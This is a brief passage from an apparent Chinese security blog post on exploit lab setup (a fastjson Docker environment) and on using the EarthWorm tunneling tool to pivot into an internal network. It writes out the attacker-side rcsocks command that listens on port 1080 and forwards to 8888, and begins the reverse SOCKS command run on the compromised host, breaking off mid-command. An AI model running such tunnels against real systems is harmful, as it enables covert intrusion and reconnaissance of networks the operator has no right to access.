weixin_44414845的博客

漏洞利用环境和payload参考君来自:环境搭建注意点：配置一个好的镜像源。fastjson docker环境启动和关闭。

ew的实战详见博客，写的很好。这里重点说下文章中的场景一：把流量代理到攻击机，进行内网信息收集（反向代理方式）。1.由于目标机没有公网IP，但是能访问公网。因为目标机没有具体地址，无法使用正向连接，可使用反弹连接的方式代理流量。在攻击机本地启动流量转发，将来自外部1080端口的流量转发到本地8888端口，并等待目标反弹连接：./ew_for_linux -s rcsocks -l 1080 -e 88882.在目标机V1上启动socks5服务，并反弹到攻击机的8888端口：./ew -s rs